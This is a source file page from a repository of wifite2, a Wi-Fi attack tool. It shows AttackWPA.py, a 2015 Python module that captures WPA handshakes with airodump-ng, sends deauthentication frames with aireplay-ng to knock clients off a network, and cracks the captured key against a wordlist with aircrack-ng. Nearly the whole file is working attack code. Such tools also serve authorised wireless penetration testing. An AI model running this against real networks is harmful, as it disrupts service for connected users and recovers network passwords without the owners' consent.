alexandre/wifite2
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
Files
0940b39554c8716b5f98db236c520a8731cbc22d
wifite2/py/AttackWPA.py
derv82 0940b39554 WPA handshake capture and cracking and deauth works 
Probably needs some tweaks/bug fixes, but yea.
2015-06-01 01:32:19 -07:00

204 lines
7.6 KiB
Python
Raw Blame History

#!/usr/bin/python
from Attack import Attack
from Airodump import Airodump
from Color import Color
from Configuration import Configuration
from Handshake import Handshake
from Process import Process
from WPAResult import WPAResult
import time
import os
import re
from shutil import copy
class AttackWPA(Attack):
def __init__(self, target):
super(AttackWPA, self).__init__(target)
self.crack_result = None
def run(self):
'''
Initiates full WPA hanshake capture attack.
'''
# First, start Airodump process
with Airodump(channel=self.target.channel,
target_bssid=self.target.bssid,
output_file_prefix='wpa') as airodump:
Color.p('\r{+} {O}waiting{W} for target to appear...')
airodump_target = self.wait_for_target(airodump)
clients = airodump_target.clients
client_index = 0
handshake = None
time_since_deauth = time.time()
deauth_proc = None
while True:
Color.clear_line()
Color.p('\r{+} waiting for {C}handshake{W}...')
time.sleep(1)
# Find .cap file
cap_files = airodump.find_files(endswith='.cap')
if len(cap_files) == 0:
# No cap files yet
continue
cap_file = cap_files[0]
# TODO: Copy .cap file to temp for consistency
# Check for Handshake
bssid = airodump_target.bssid
essid = None
if airodump_target.essid_known:
essid = airodump_target.essid
handshake = Handshake(cap_file, bssid=bssid, essid=essid)
if handshake.has_handshake():
# We got a handshake
Color.pl('\n\n{+} {G}successfully captured handshake{W}')
break
# TODO: Delete copied .cap file in temp to save space
# Check status of deauth process
if deauth_proc and deauth_proc.poll() == None:
# Deauth process is still running
time_since_deauth = time.time()
# Send deauth to a client or broadcast
if time.time()-time_since_deauth > Configuration.wpa_deauth_timeout:
# We are N seconds since last deauth was sent,
# And the deauth process is not running.
if len(clients) == 0 or client_index >= len(clients):
# TODO: Send deauth for broadcast
deauth_proc = self.deauth(airodump_target.bssid)
client_index = 0
else:
# TODO: Send deauth for client
client = clients[client_index]
deauth_proc = self.deauth(client.bssid)
client_index += 1
time_since_deauth = time.time()
continue
# Stop the deauth process if needed
if deauth_proc and deauth_proc.poll() == None:
deauth_proc.interrupt()
if not handshake:
# No handshake, attack failed.
raise Exception('Handshake not captured')
return False
key = None
# Save copy of handshake to ./hs/
self.save_handshake(handshake)
# Print analysis of handshake file
Color.pl('\n{+} analysis of captured handshake file:')
handshake.analyze()
# Crack handshake
wordlist = Configuration.wordlist
if wordlist != None:
wordlist_name = wordlist.split(os.sep)[-1]
if not os.path.exists(wordlist):
Color.pl('{!} {R}unable to crack:' +
' wordlist {O}%s{R} does not exist{W}' % wordlist)
else:
# We have a wordlist we can use
Color.p('\n{+} {C}cracking handshake{W}' +
' using {C}aircrack-ng{W}' +
' with {C}%s{W} wordlist' % wordlist_name)
# TODO: More-verbose cracking status
# 1. Read number of lines in 'wordlist'
# 2. Pipe aircrack stdout to file
# 3. Read from file every second, get keys tried so far
# 4. Display # of keys tried / total keys, and ETA
key_file = Configuration.temp('wpakey.txt')
command = [
'aircrack-ng',
'-a', '2',
'-w', wordlist,
'-l', key_file,
handshake.capfile
]
aircrack = Process(command, devnull=True)
aircrack.wait()
if os.path.exists(key_file):
# We cracked it.
Color.pl('\n\n{+} {G}successfully cracked PSK{W}\n')
f = open(key_file, 'r')
key = f.read()
f.close()
else:
Color.pl('\n{!} {R}handshake crack failed:' +
' {O}%s did not contain password{W}'
% wordlist.split(os.sep)[-1])
self.crack_result = WPAResult(bssid, essid, handshake.capfile, key)
self.crack_result.dump()
return True
def save_handshake(self, handshake):
'''
Saves a copy of the handshake file to hs/
Args:
handshake - Instance of Handshake containing bssid, essid, capfile
'''
# Create handshake dir
if not os.path.exists(Configuration.wpa_handshake_dir):
os.mkdir(Configuration.wpa_handshake_dir)
# Generate filesystem-safe filename from bssid, essid and date
essid_safe = re.sub('[^a-zA-Z0-9]', '', handshake.essid)
bssid_safe = handshake.bssid.replace(':', '-')
date = time.strftime('%Y-%m-%dT%H-%M-%S')
cap_filename = 'handshake_%s_%s_%s.cap' % (essid_safe, bssid_safe, date)
cap_filename = os.path.join(Configuration.wpa_handshake_dir, cap_filename)
Color.p('{+} saving copy of {C}handshake{W} to {C}%s{W} ' % cap_filename)
copy(handshake.capfile, cap_filename)
Color.pl(' {G}saved{W}')
# Update handshake to use the stored handshake file for future operations
handshake.capfile = cap_filename
def deauth(self, target_bssid, station_bssid=None):
'''
Sends deauthentication request.
Args:
target_bssid - AP BSSID to deauth
station_bssid - Client BSSID to deauth
Deauths 'broadcast' if no client is specified.
'''
command = [
'aireplay-ng',
'--ignore-negative-one',
'-0', # Deauthentication
'-a', self.target.bssid
]
if station_bssid:
# Deauthing a specific client
command.extend(['-h', station_bssid])
command.append(Configuration.interface)
return Process(command)
if __name__ == '__main__':
from Target import Target
fields = "A4:2B:8C:16:6B:3A, 2015-05-27 19:28:44, 2015-05-27 19:28:46, 11, 54e,WPA, WPA, , -58, 2, 0, 0. 0. 0. 0, 9, Test Router Please Ignore, ".split(',')
target = Target(fields)
wpa = AttackWPA(target)
wpa.run()
Reference in New Issue View Git Blame Copy Permalink